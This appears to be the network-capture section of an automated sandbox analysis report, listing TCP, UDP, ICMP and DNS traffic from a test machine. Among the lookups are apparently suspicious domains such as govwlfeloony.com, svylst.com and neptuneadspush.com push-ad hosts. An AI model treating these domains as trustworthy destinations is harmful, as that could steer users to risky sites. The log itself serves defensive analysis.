                                                          Nov 27, 2023 04:24:36.310714006 CET49781443192.168.2.520.12.23.50
                                                          Nov 27, 2023 04:24:36.315628052 CET49781443192.168.2.520.12.23.50
                                                          Nov 27, 2023 04:24:36.315637112 CET4434978120.12.23.50192.168.2.5
                                                          Nov 27, 2023 04:24:36.315845013 CET4434978120.12.23.50192.168.2.5
                                                          Nov 27, 2023 04:24:36.326800108 CET49781443192.168.2.520.12.23.50
                                                          Nov 27, 2023 04:24:36.373262882 CET4434978120.12.23.50192.168.2.5
                                                          Nov 27, 2023 04:24:36.603950977 CET4434978120.12.23.50192.168.2.5
                                                          Nov 27, 2023 04:24:36.603975058 CET4434978120.12.23.50192.168.2.5
                                                          Nov 27, 2023 04:24:36.603988886 CET4434978120.12.23.50192.168.2.5
                                                          Nov 27, 2023 04:24:36.604083061 CET49781443192.168.2.520.12.23.50
                                                          Nov 27, 2023 04:24:36.604095936 CET4434978120.12.23.50192.168.2.5
                                                          Nov 27, 2023 04:24:36.604106903 CET4434978120.12.23.50192.168.2.5
                                                          Nov 27, 2023 04:24:36.604111910 CET4434978120.12.23.50192.168.2.5
                                                          Nov 27, 2023 04:24:36.604243994 CET49781443192.168.2.520.12.23.50
                                                          Nov 27, 2023 04:24:36.622541904 CET49781443192.168.2.520.12.23.50
                                                          Nov 27, 2023 04:24:36.622562885 CET4434978120.12.23.50192.168.2.5
                                                          Nov 27, 2023 04:24:36.622592926 CET49781443192.168.2.520.12.23.50
                                                          Nov 27, 2023 04:24:36.622600079 CET4434978120.12.23.50192.168.2.5
                                                          Nov 27, 2023 04:24:41.939106941 CET49783443192.168.2.5104.21.1.7
                                                          Nov 27, 2023 04:24:41.939136982 CET44349783104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:24:41.939203978 CET49783443192.168.2.5104.21.1.7
                                                          Nov 27, 2023 04:24:41.939495087 CET49784443192.168.2.5104.21.1.7
                                                          Nov 27, 2023 04:24:41.939531088 CET44349784104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:24:41.939575911 CET49784443192.168.2.5104.21.1.7
                                                          Nov 27, 2023 04:24:41.940246105 CET49784443192.168.2.5104.21.1.7
                                                          Nov 27, 2023 04:24:41.940263033 CET44349784104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:24:41.940484047 CET49783443192.168.2.5104.21.1.7
                                                          Nov 27, 2023 04:24:41.940500975 CET44349783104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:24:42.084633112 CET4434971338.62.240.122192.168.2.5
                                                          Nov 27, 2023 04:24:42.084708929 CET4434971338.62.240.122192.168.2.5
                                                          Nov 27, 2023 04:24:42.084844112 CET49713443192.168.2.538.62.240.122
                                                          Nov 27, 2023 04:24:42.215514898 CET44349784104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:24:42.215869904 CET49784443192.168.2.5104.21.1.7
                                                          Nov 27, 2023 04:24:42.215889931 CET44349784104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:24:42.218116999 CET44349784104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:24:42.219609022 CET49784443192.168.2.5104.21.1.7
                                                          Nov 27, 2023 04:24:42.220468998 CET44349784104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:24:42.220535994 CET49784443192.168.2.5104.21.1.7
                                                          Nov 27, 2023 04:24:42.221152067 CET44349783104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:24:42.221409082 CET49783443192.168.2.5104.21.1.7
                                                          Nov 27, 2023 04:24:42.221426964 CET44349783104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:24:42.222646952 CET44349783104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:24:42.223690033 CET49783443192.168.2.5104.21.1.7
                                                          Nov 27, 2023 04:24:42.225485086 CET44349783104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:24:42.261264086 CET44349784104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:24:42.265419960 CET49783443192.168.2.5104.21.1.7
                                                          Nov 27, 2023 04:24:42.936584949 CET44349784104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:24:42.936636925 CET44349784104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:24:42.936672926 CET44349784104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:24:42.936697006 CET49784443192.168.2.5104.21.1.7
                                                          Nov 27, 2023 04:24:42.936706066 CET44349784104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:24:42.936714888 CET44349784104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:24:42.936755896 CET49784443192.168.2.5104.21.1.7
                                                          Nov 27, 2023 04:24:42.936769009 CET44349784104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:24:42.936810970 CET49784443192.168.2.5104.21.1.7
                                                          Nov 27, 2023 04:24:42.936816931 CET44349784104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:24:42.937037945 CET44349784104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:24:42.937069893 CET44349784104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:24:42.937079906 CET49784443192.168.2.5104.21.1.7
                                                          Nov 27, 2023 04:24:42.937084913 CET44349784104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:24:42.937119961 CET49784443192.168.2.5104.21.1.7
                                                          Nov 27, 2023 04:24:42.937124968 CET44349784104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:24:42.937681913 CET44349784104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:24:42.937717915 CET44349784104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:24:42.937726021 CET49784443192.168.2.5104.21.1.7
                                                          Nov 27, 2023 04:24:42.937731028 CET44349784104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:24:42.937771082 CET49784443192.168.2.5104.21.1.7
                                                          Nov 27, 2023 04:24:42.937778950 CET44349784104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:24:42.938486099 CET44349784104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:24:42.938518047 CET44349784104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:24:42.938540936 CET49784443192.168.2.5104.21.1.7
                                                          Nov 27, 2023 04:24:42.938545942 CET44349784104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:24:42.938575983 CET44349784104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:24:42.938591003 CET49784443192.168.2.5104.21.1.7
                                                          Nov 27, 2023 04:24:42.938596964 CET44349784104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:24:42.938636065 CET49784443192.168.2.5104.21.1.7
                                                          Nov 27, 2023 04:24:42.939291954 CET44349784104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:24:42.939368963 CET44349784104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:24:42.939409971 CET49784443192.168.2.5104.21.1.7
                                                          Nov 27, 2023 04:24:42.939414024 CET44349784104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:24:42.939474106 CET44349784104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:24:42.939528942 CET49784443192.168.2.5104.21.1.7
                                                          Nov 27, 2023 04:24:43.013834953 CET49784443192.168.2.5104.21.1.7
                                                          Nov 27, 2023 04:24:43.013849974 CET44349784104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:24:44.238289118 CET49713443192.168.2.538.62.240.122
                                                          Nov 27, 2023 04:24:44.238325119 CET4434971338.62.240.122192.168.2.5
                                                          Nov 27, 2023 04:24:44.244689941 CET49785443192.168.2.5172.253.62.106
                                                          Nov 27, 2023 04:24:44.244738102 CET44349785172.253.62.106192.168.2.5
                                                          Nov 27, 2023 04:24:44.244801044 CET49785443192.168.2.5172.253.62.106
                                                          Nov 27, 2023 04:24:44.245126963 CET49785443192.168.2.5172.253.62.106
                                                          Nov 27, 2023 04:24:44.245142937 CET44349785172.253.62.106192.168.2.5
                                                          Nov 27, 2023 04:24:44.437611103 CET44349785172.253.62.106192.168.2.5
                                                          Nov 27, 2023 04:24:44.439305067 CET49785443192.168.2.5172.253.62.106
                                                          Nov 27, 2023 04:24:44.439316034 CET44349785172.253.62.106192.168.2.5
                                                          Nov 27, 2023 04:24:44.439630032 CET44349785172.253.62.106192.168.2.5
                                                          Nov 27, 2023 04:24:44.463964939 CET49785443192.168.2.5172.253.62.106
                                                          Nov 27, 2023 04:24:44.464025021 CET44349785172.253.62.106192.168.2.5
                                                          Nov 27, 2023 04:24:44.519176006 CET49785443192.168.2.5172.253.62.106
                                                          Nov 27, 2023 04:24:46.351073980 CET49783443192.168.2.5104.21.1.7
                                                          Nov 27, 2023 04:24:46.397272110 CET44349783104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:24:46.487802982 CET44349783104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:24:46.487873077 CET44349783104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:24:46.487930059 CET49783443192.168.2.5104.21.1.7
                                                          Nov 27, 2023 04:24:46.488496065 CET49783443192.168.2.5104.21.1.7
                                                          Nov 27, 2023 04:24:46.488509893 CET44349783104.21.1.7192.168.2.5
                                                          Nov 27, 2023 04:24:54.456783056 CET44349785172.253.62.106192.168.2.5
                                                          Nov 27, 2023 04:24:54.456836939 CET44349785172.253.62.106192.168.2.5
                                                          Nov 27, 2023 04:24:54.456986904 CET49785443192.168.2.5172.253.62.106
                                                          Nov 27, 2023 04:24:55.932797909 CET49785443192.168.2.5172.253.62.106
                                                          Nov 27, 2023 04:24:55.932828903 CET44349785172.253.62.106192.168.2.5
                                                          Nov 27, 2023 04:25:08.728916883 CET49787443192.168.2.5172.253.122.102
                                                          Nov 27, 2023 04:25:08.728979111 CET44349787172.253.122.102192.168.2.5
                                                          Nov 27, 2023 04:25:08.729034901 CET49787443192.168.2.5172.253.122.102
                                                          Nov 27, 2023 04:25:08.730019093 CET49787443192.168.2.5172.253.122.102
                                                          Nov 27, 2023 04:25:08.730036020 CET44349787172.253.122.102192.168.2.5
                                                          Nov 27, 2023 04:25:08.923624992 CET44349787172.253.122.102192.168.2.5
                                                          Nov 27, 2023 04:25:08.923973083 CET49787443192.168.2.5172.253.122.102
                                                          Nov 27, 2023 04:25:08.923985004 CET44349787172.253.122.102192.168.2.5
                                                          Nov 27, 2023 04:25:08.924299955 CET44349787172.253.122.102192.168.2.5
                                                          Nov 27, 2023 04:25:08.924362898 CET49787443192.168.2.5172.253.122.102
                                                          Nov 27, 2023 04:25:08.924910069 CET44349787172.253.122.102192.168.2.5
                                                          Nov 27, 2023 04:25:08.924967051 CET49787443192.168.2.5172.253.122.102
                                                          Nov 27, 2023 04:25:08.926014900 CET49787443192.168.2.5172.253.122.102
                                                          Nov 27, 2023 04:25:08.926071882 CET44349787172.253.122.102192.168.2.5
                                                          Nov 27, 2023 04:25:08.926192999 CET49787443192.168.2.5172.253.122.102
                                                          Nov 27, 2023 04:25:08.926199913 CET44349787172.253.122.102192.168.2.5
                                                          Nov 27, 2023 04:25:08.968252897 CET49787443192.168.2.5172.253.122.102
                                                          Nov 27, 2023 04:25:09.135590076 CET44349787172.253.122.102192.168.2.5
                                                          Nov 27, 2023 04:25:09.137614965 CET44349787172.253.122.102192.168.2.5
                                                          Nov 27, 2023 04:25:09.137773037 CET49787443192.168.2.5172.253.122.102
                                                          Nov 27, 2023 04:25:09.137799978 CET49787443192.168.2.5172.253.122.102
                                                          Nov 27, 2023 04:25:09.137816906 CET44349787172.253.122.102192.168.2.5
                                                          Nov 27, 2023 04:25:14.546171904 CET4971780192.168.2.5104.21.78.140
                                                          Nov 27, 2023 04:25:14.670336008 CET8049717104.21.78.140192.168.2.5
                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Nov 27, 2023 04:23:39.724996090 CET5143153192.168.2.51.1.1.1
                                                          Nov 27, 2023 04:23:39.726337910 CET6316253192.168.2.51.1.1.1
                                                          Nov 27, 2023 04:23:39.726901054 CET5751353192.168.2.51.1.1.1
                                                          Nov 27, 2023 04:23:39.727164030 CET5352053192.168.2.51.1.1.1
                                                          Nov 27, 2023 04:23:39.832622051 CET53555341.1.1.1192.168.2.5
                                                          Nov 27, 2023 04:23:39.850802898 CET53514311.1.1.1192.168.2.5
                                                          Nov 27, 2023 04:23:39.850816011 CET53575131.1.1.1192.168.2.5
                                                          Nov 27, 2023 04:23:39.850830078 CET53631621.1.1.1192.168.2.5
                                                          Nov 27, 2023 04:23:39.852226973 CET53535201.1.1.1192.168.2.5
                                                          Nov 27, 2023 04:23:40.432145119 CET53623451.1.1.1192.168.2.5
                                                          Nov 27, 2023 04:23:41.096457005 CET53546491.1.1.1192.168.2.5
                                                          Nov 27, 2023 04:23:41.579351902 CET5285653192.168.2.51.1.1.1
                                                          Nov 27, 2023 04:23:41.579827070 CET5515153192.168.2.51.1.1.1
                                                          Nov 27, 2023 04:23:41.699278116 CET5904853192.168.2.51.1.1.1
                                                          Nov 27, 2023 04:23:41.700181007 CET5417853192.168.2.51.1.1.1
                                                          Nov 27, 2023 04:23:41.757745028 CET53528561.1.1.1192.168.2.5
                                                          Nov 27, 2023 04:23:41.757924080 CET53551511.1.1.1192.168.2.5
                                                          Nov 27, 2023 04:23:41.824938059 CET53590481.1.1.1192.168.2.5
                                                          Nov 27, 2023 04:23:41.825299978 CET53541781.1.1.1192.168.2.5
                                                          Nov 27, 2023 04:23:42.257987976 CET5505553192.168.2.51.1.1.1
                                                          Nov 27, 2023 04:23:42.258431911 CET5985753192.168.2.51.1.1.1
                                                          Nov 27, 2023 04:23:42.382123947 CET53598571.1.1.1192.168.2.5
                                                          Nov 27, 2023 04:23:42.382831097 CET53550551.1.1.1192.168.2.5
                                                          Nov 27, 2023 04:23:42.771570921 CET5728553192.168.2.51.1.1.1
                                                          Nov 27, 2023 04:23:42.771893024 CET6081153192.168.2.51.1.1.1
                                                          Nov 27, 2023 04:23:42.903717995 CET53572851.1.1.1192.168.2.5
                                                          Nov 27, 2023 04:23:42.962994099 CET53608111.1.1.1192.168.2.5
                                                          Nov 27, 2023 04:23:44.026251078 CET5103553192.168.2.51.1.1.1
                                                          Nov 27, 2023 04:23:44.026560068 CET5972253192.168.2.51.1.1.1
                                                          Nov 27, 2023 04:23:44.151392937 CET53597221.1.1.1192.168.2.5
                                                          Nov 27, 2023 04:23:44.151411057 CET53510351.1.1.1192.168.2.5
                                                          Nov 27, 2023 04:23:45.305892944 CET5298353192.168.2.51.1.1.1
                                                          Nov 27, 2023 04:23:45.306229115 CET5842653192.168.2.51.1.1.1
                                                          Nov 27, 2023 04:23:45.306657076 CET5429453192.168.2.51.1.1.1
                                                          Nov 27, 2023 04:23:45.308665991 CET5916453192.168.2.51.1.1.1
                                                          Nov 27, 2023 04:23:45.351689100 CET5535553192.168.2.51.1.1.1
                                                          Nov 27, 2023 04:23:45.352018118 CET5583653192.168.2.51.1.1.1
                                                          Nov 27, 2023 04:23:45.431442022 CET53529831.1.1.1192.168.2.5
                                                          Nov 27, 2023 04:23:45.434801102 CET53542941.1.1.1192.168.2.5
                                                          Nov 27, 2023 04:23:45.435677052 CET53591641.1.1.1192.168.2.5
                                                          Nov 27, 2023 04:23:45.455770969 CET53584261.1.1.1192.168.2.5
                                                          Nov 27, 2023 04:23:45.479222059 CET53558361.1.1.1192.168.2.5
                                                          Nov 27, 2023 04:23:45.560125113 CET53553551.1.1.1192.168.2.5
                                                          Nov 27, 2023 04:23:45.596704960 CET5042353192.168.2.51.1.1.1
                                                          Nov 27, 2023 04:23:45.597100973 CET5359153192.168.2.51.1.1.1
                                                          Nov 27, 2023 04:23:45.723148108 CET53504231.1.1.1192.168.2.5
                                                          Nov 27, 2023 04:23:45.724821091 CET53535911.1.1.1192.168.2.5
                                                          Nov 27, 2023 04:23:46.982177973 CET6551353192.168.2.51.1.1.1
                                                          Nov 27, 2023 04:23:46.982537985 CET6199353192.168.2.51.1.1.1
                                                          Nov 27, 2023 04:23:47.108946085 CET53619931.1.1.1192.168.2.5
                                                          Nov 27, 2023 04:23:47.110044003 CET53655131.1.1.1192.168.2.5
                                                          Nov 27, 2023 04:23:49.589373112 CET53603481.1.1.1192.168.2.5
                                                          Nov 27, 2023 04:23:49.594057083 CET53556271.1.1.1192.168.2.5
                                                          Nov 27, 2023 04:23:49.734327078 CET6074053192.168.2.51.1.1.1
                                                          Nov 27, 2023 04:23:49.734688997 CET5242753192.168.2.51.1.1.1
                                                          Nov 27, 2023 04:23:49.861304998 CET53607401.1.1.1192.168.2.5
                                                          Nov 27, 2023 04:23:49.862173080 CET53524271.1.1.1192.168.2.5
                                                          Nov 27, 2023 04:23:50.134679079 CET53598301.1.1.1192.168.2.5
                                                          Nov 27, 2023 04:23:51.090750933 CET5932453192.168.2.51.1.1.1
                                                          Nov 27, 2023 04:23:51.091991901 CET5892353192.168.2.51.1.1.1
                                                          Nov 27, 2023 04:23:51.219249964 CET53593241.1.1.1192.168.2.5
                                                          Nov 27, 2023 04:23:51.220175028 CET53589231.1.1.1192.168.2.5
                                                          Nov 27, 2023 04:23:51.310503960 CET53549781.1.1.1192.168.2.5
                                                          Nov 27, 2023 04:23:52.622035980 CET53596641.1.1.1192.168.2.5
                                                          Nov 27, 2023 04:23:52.811131001 CET6351153192.168.2.51.1.1.1
                                                          Nov 27, 2023 04:23:52.812136889 CET5069753192.168.2.51.1.1.1
                                                          Nov 27, 2023 04:23:52.935066938 CET53635111.1.1.1192.168.2.5
                                                          Nov 27, 2023 04:23:52.935729980 CET53506971.1.1.1192.168.2.5
                                                          Nov 27, 2023 04:23:52.936508894 CET6281819302192.168.2.5142.250.112.127
                                                          Nov 27, 2023 04:23:52.942687035 CET6537053192.168.2.51.1.1.1
                                                          Nov 27, 2023 04:23:53.038371086 CET1930262818142.250.112.127192.168.2.5
                                                          Nov 27, 2023 04:23:53.067167997 CET53653701.1.1.1192.168.2.5
                                                          Nov 27, 2023 04:23:53.510288000 CET4978553192.168.2.51.1.1.1
                                                          Nov 27, 2023 04:23:53.510924101 CET5379853192.168.2.51.1.1.1
                                                          Nov 27, 2023 04:23:53.636158943 CET53497851.1.1.1192.168.2.5
                                                          Nov 27, 2023 04:23:53.642005920 CET53537981.1.1.1192.168.2.5
                                                          Nov 27, 2023 04:23:58.911720991 CET53521411.1.1.1192.168.2.5
                                                          Nov 27, 2023 04:24:01.570143938 CET5200253192.168.2.51.1.1.1
                                                          Nov 27, 2023 04:24:01.571038008 CET4966353192.168.2.51.1.1.1
                                                          Nov 27, 2023 04:24:01.694446087 CET53520021.1.1.1192.168.2.5
                                                          Nov 27, 2023 04:24:01.694777966 CET53496631.1.1.1192.168.2.5
                                                          Nov 27, 2023 04:24:03.149235964 CET6281819302192.168.2.5142.250.112.127
                                                          Nov 27, 2023 04:24:03.252383947 CET1930262818142.250.112.127192.168.2.5
                                                          Nov 27, 2023 04:24:13.281244040 CET6281819302192.168.2.5142.250.112.127
                                                          Nov 27, 2023 04:24:13.383451939 CET1930262818142.250.112.127192.168.2.5
                                                          Nov 27, 2023 04:24:19.352032900 CET53576511.1.1.1192.168.2.5
                                                          Nov 27, 2023 04:24:23.429867983 CET6281819302192.168.2.5142.250.112.127
                                                          Nov 27, 2023 04:24:23.531656027 CET1930262818142.250.112.127192.168.2.5
                                                          Nov 27, 2023 04:24:33.548221111 CET6281819302192.168.2.5142.250.112.127
                                                          Nov 27, 2023 04:24:33.650089979 CET1930262818142.250.112.127192.168.2.5
                                                          Nov 27, 2023 04:24:39.316006899 CET53505341.1.1.1192.168.2.5
                                                          Nov 27, 2023 04:24:43.671749115 CET6281819302192.168.2.5142.250.112.127
                                                          Nov 27, 2023 04:24:43.773730040 CET1930262818142.250.112.127192.168.2.5
                                                          Nov 27, 2023 04:24:44.364459038 CET53500651.1.1.1192.168.2.5
                                                          Nov 27, 2023 04:24:53.780978918 CET6281819302192.168.2.5142.250.112.127
                                                          Nov 27, 2023 04:24:53.883173943 CET1930262818142.250.112.127192.168.2.5
                                                          Nov 27, 2023 04:25:04.369684935 CET6281819302192.168.2.5142.250.112.127
                                                          Nov 27, 2023 04:25:04.471905947 CET1930262818142.250.112.127192.168.2.5
                                                          Nov 27, 2023 04:25:07.515547037 CET53588901.1.1.1192.168.2.5
                                                          Nov 27, 2023 04:25:08.598532915 CET5754853192.168.2.51.1.1.1
                                                          Nov 27, 2023 04:25:08.598957062 CET4923953192.168.2.51.1.1.1
                                                          Nov 27, 2023 04:25:08.724175930 CET53575481.1.1.1192.168.2.5
                                                          Nov 27, 2023 04:25:08.724987984 CET53492391.1.1.1192.168.2.5
                                                          Nov 27, 2023 04:25:14.499320984 CET6281819302192.168.2.5142.250.112.127
                                                          Nov 27, 2023 04:25:14.601408958 CET1930262818142.250.112.127192.168.2.5
                                                          Nov 27, 2023 04:25:25.019145012 CET6281819302192.168.2.5142.250.112.127
                                                          Nov 27, 2023 04:25:25.121093035 CET1930262818142.250.112.127192.168.2.5
                                                          Nov 27, 2023 04:25:36.083713055 CET6281819302192.168.2.5142.250.112.127
                                                          Nov 27, 2023 04:25:36.185728073 CET1930262818142.250.112.127192.168.2.5
                                                          TimestampSource IPDest IPChecksumCodeType
                                                          Nov 27, 2023 04:23:42.963083982 CET192.168.2.51.1.1.1c22a(Port unreachable)Destination Unreachable
                                                          Nov 27, 2023 04:23:45.560197115 CET192.168.2.51.1.1.1c201(Port unreachable)Destination Unreachable
                                                          Nov 27, 2023 04:23:52.620352030 CET192.168.2.51.1.1.1c286(Port unreachable)Destination Unreachable
                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                          Nov 27, 2023 04:23:39.724996090 CET192.168.2.51.1.1.10xf36fStandard query (0)clients2.google.comA (IP address)IN (0x0001)false
                                                          Nov 27, 2023 04:23:39.726337910 CET192.168.2.51.1.1.10xa020Standard query (0)clients2.google.com65IN (0x0001)false
                                                          Nov 27, 2023 04:23:39.726901054 CET192.168.2.51.1.1.10x8454Standard query (0)accounts.google.comA (IP address)IN (0x0001)false
                                                          Nov 27, 2023 04:23:39.727164030 CET192.168.2.51.1.1.10x195eStandard query (0)accounts.google.com65IN (0x0001)false
                                                          Nov 27, 2023 04:23:41.579351902 CET192.168.2.51.1.1.10x7aaStandard query (0)www.govwlfeloony.comA (IP address)IN (0x0001)false
                                                          Nov 27, 2023 04:23:41.579827070 CET192.168.2.51.1.1.10x7943Standard query (0)www.govwlfeloony.com65IN (0x0001)false
                                                          Nov 27, 2023 04:23:41.699278116 CET192.168.2.51.1.1.10x1602Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                          Nov 27, 2023 04:23:41.700181007 CET192.168.2.51.1.1.10xefdeStandard query (0)www.google.com65IN (0x0001)false
                                                          Nov 27, 2023 04:23:42.257987976 CET192.168.2.51.1.1.10xb533Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                          Nov 27, 2023 04:23:42.258431911 CET192.168.2.51.1.1.10xe0c5Standard query (0)www.google.com65IN (0x0001)false
                                                          Nov 27, 2023 04:23:42.771570921 CET192.168.2.51.1.1.10x6eb8Standard query (0)svylst.comA (IP address)IN (0x0001)false
                                                          Nov 27, 2023 04:23:42.771893024 CET192.168.2.51.1.1.10x6ebcStandard query (0)svylst.com65IN (0x0001)false
                                                          Nov 27, 2023 04:23:44.026251078 CET192.168.2.51.1.1.10x19cdStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                          Nov 27, 2023 04:23:44.026560068 CET192.168.2.51.1.1.10x6c9Standard query (0)www.google.com65IN (0x0001)false
                                                          Nov 27, 2023 04:23:45.305892944 CET192.168.2.51.1.1.10x3b8dStandard query (0)svylst.comA (IP address)IN (0x0001)false
                                                          Nov 27, 2023 04:23:45.306229115 CET192.168.2.51.1.1.10x3d35Standard query (0)svylst.com65IN (0x0001)false
                                                          Nov 27, 2023 04:23:45.306657076 CET192.168.2.51.1.1.10x8db8Standard query (0)svylst.comA (IP address)IN (0x0001)false
                                                          Nov 27, 2023 04:23:45.308665991 CET192.168.2.51.1.1.10x7ba6Standard query (0)svylst.com65IN (0x0001)false
                                                          Nov 27, 2023 04:23:45.351689100 CET192.168.2.51.1.1.10x4d0dStandard query (0)svylst.comA (IP address)IN (0x0001)false
                                                          Nov 27, 2023 04:23:45.352018118 CET192.168.2.51.1.1.10xde43Standard query (0)svylst.com65IN (0x0001)false
                                                          Nov 27, 2023 04:23:45.596704960 CET192.168.2.51.1.1.10x8162Standard query (0)svylst.comA (IP address)IN (0x0001)false
                                                          Nov 27, 2023 04:23:45.597100973 CET192.168.2.51.1.1.10x3fcfStandard query (0)svylst.com65IN (0x0001)false
                                                          Nov 27, 2023 04:23:46.982177973 CET192.168.2.51.1.1.10x9858Standard query (0)sofa.thriveuniversehq.comA (IP address)IN (0x0001)false
                                                          Nov 27, 2023 04:23:46.982537985 CET192.168.2.51.1.1.10xe264Standard query (0)sofa.thriveuniversehq.com65IN (0x0001)false
                                                          Nov 27, 2023 04:23:49.734327078 CET192.168.2.51.1.1.10xde24Standard query (0)sofa.thriveuniversehq.comA (IP address)IN (0x0001)false
                                                          Nov 27, 2023 04:23:49.734688997 CET192.168.2.51.1.1.10x417dStandard query (0)sofa.thriveuniversehq.com65IN (0x0001)false
                                                          Nov 27, 2023 04:23:51.090750933 CET192.168.2.51.1.1.10xfa91Standard query (0)pushrev.neptuneadspush.comA (IP address)IN (0x0001)false
                                                          Nov 27, 2023 04:23:51.091991901 CET192.168.2.51.1.1.10xcd81Standard query (0)pushrev.neptuneadspush.com65IN (0x0001)false
                                                          Nov 27, 2023 04:23:52.811131001 CET192.168.2.51.1.1.10x3d42Standard query (0)stun.l.google.comA (IP address)IN (0x0001)false
                                                          Nov 27, 2023 04:23:52.812136889 CET192.168.2.51.1.1.10xae26Standard query (0)stun.l.google.com28IN (0x0001)false
                                                          Nov 27, 2023 04:23:52.942687035 CET192.168.2.51.1.1.10xa67dStandard query (0)stun.l.google.com28IN (0x0001)false
                                                          Nov 27, 2023 04:23:53.510288000 CET192.168.2.51.1.1.10xa8f2Standard query (0)pushlite.neptuneadspush.comA (IP address)IN (0x0001)false
                                                          Nov 27, 2023 04:23:53.510924101 CET192.168.2.51.1.1.10x6c2eStandard query (0)pushlite.neptuneadspush.com65IN (0x0001)false
                                                          Nov 27, 2023 04:24:01.570143938 CET192.168.2.51.1.1.10x802cStandard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                          Nov 27, 2023 04:24:01.571038008 CET192.168.2.51.1.1.10xb928Standard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                          Nov 27, 2023 04:25:08.598532915 CET192.168.2.51.1.1.10x720Standard query (0)clients1.google.comA (IP address)IN (0x0001)false
                                                          Nov 27, 2023 04:25:08.598957062 CET192.168.2.51.1.1.10xdccStandard query (0)clients1.google.com65IN (0x0001)false
                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                          Nov 27, 2023 04:23:39.850802898 CET1.1.1.1192.168.2.50xf36fNo error (0)clients2.google.comclients.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                          Nov 27, 2023 04:23:39.850802898 CET1.1.1.1192.168.2.50xf36fNo error (0)clients.l.google.com142.251.179.100A (IP address)IN (0x0001)false
                                                          Nov 27, 2023 04:23:39.850802898 CET1.1.1.1192.168.2.50xf36fNo error (0)clients.l.google.com142.251.179.139A (IP address)IN (0x0001)false
                                                          Nov 27, 2023 04:23:39.850802898 CET1.1.1.1192.168.2.50xf36fNo error (0)clients.l.google.com142.251.179.138A (IP address)IN (0x0001)false
                                                          Nov 27, 2023 04:23:39.850802898 CET1.1.1.1192.168.2.50xf36fNo error (0)clients.l.google.com142.251.179.101A (IP address)IN (0x0001)false
                                                          Nov 27, 2023 04:23:39.850802898 CET1.1.1.1192.168.2.50xf36fNo error (0)clients.l.google.com142.251.179.113A (IP address)IN (0x0001)false
                                                          Nov 27, 2023 04:23:39.850802898 CET1.1.1.1192.168.2.50xf36fNo error (0)clients.l.google.com142.251.179.102A (IP address)IN (0x0001)false
                                                          Nov 27, 2023 04:23:39.850816011 CET1.1.1.1192.168.2.50x8454No error (0)accounts.google.com172.253.63.84A (IP address)IN (0x0001)false
                                                          Nov 27, 2023 04:23:39.850830078 CET1.1.1.1192.168.2.50xa020No error (0)clients2.google.comclients.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                          Nov 27, 2023 04:23:41.757745028 CET1.1.1.1192.168.2.50x7aaNo error (0)www.govwlfeloony.comgovwlfeloony.comCNAME (Canonical name)IN (0x0001)false
                                                          Nov 27, 2023 04:23:41.757745028 CET1.1.1.1192.168.2.50x7aaNo error (0)govwlfeloony.com38.62.240.122A (IP address)IN (0x0001)false
                                                          Nov 27, 2023 04:23:41.757924080 CET1.1.1.1192.168.2.50x7943No error (0)www.govwlfeloony.comgovwlfeloony.comCNAME (Canonical name)IN (0x0001)false
                                                          Nov 27, 2023 04:23:41.824938059 CET1.1.1.1192.168.2.50x1602No error (0)www.google.com142.251.167.104A (IP address)IN (0x0001)false
                                                          Nov 27, 2023 04:23:41.824938059 CET1.1.1.1192.168.2.50x1602No error (0)www.google.com142.251.167.106A (IP address)IN (0x0001)false
                                                          Nov 27, 2023 04:23:41.824938059 CET1.1.1.1192.168.2.50x1602No error (0)www.google.com142.251.167.105A (IP address)IN (0x0001)false
                                                          Nov 27, 2023 04:23:41.824938059 CET1.1.1.1192.168.2.50x1602No error (0)www.google.com142.251.167.99A (IP address)IN (0x0001)false
                                                          Nov 27, 2023 04:23:41.824938059 CET1.1.1.1192.168.2.50x1602No error (0)www.google.com142.251.167.147A (IP address)IN (0x0001)false
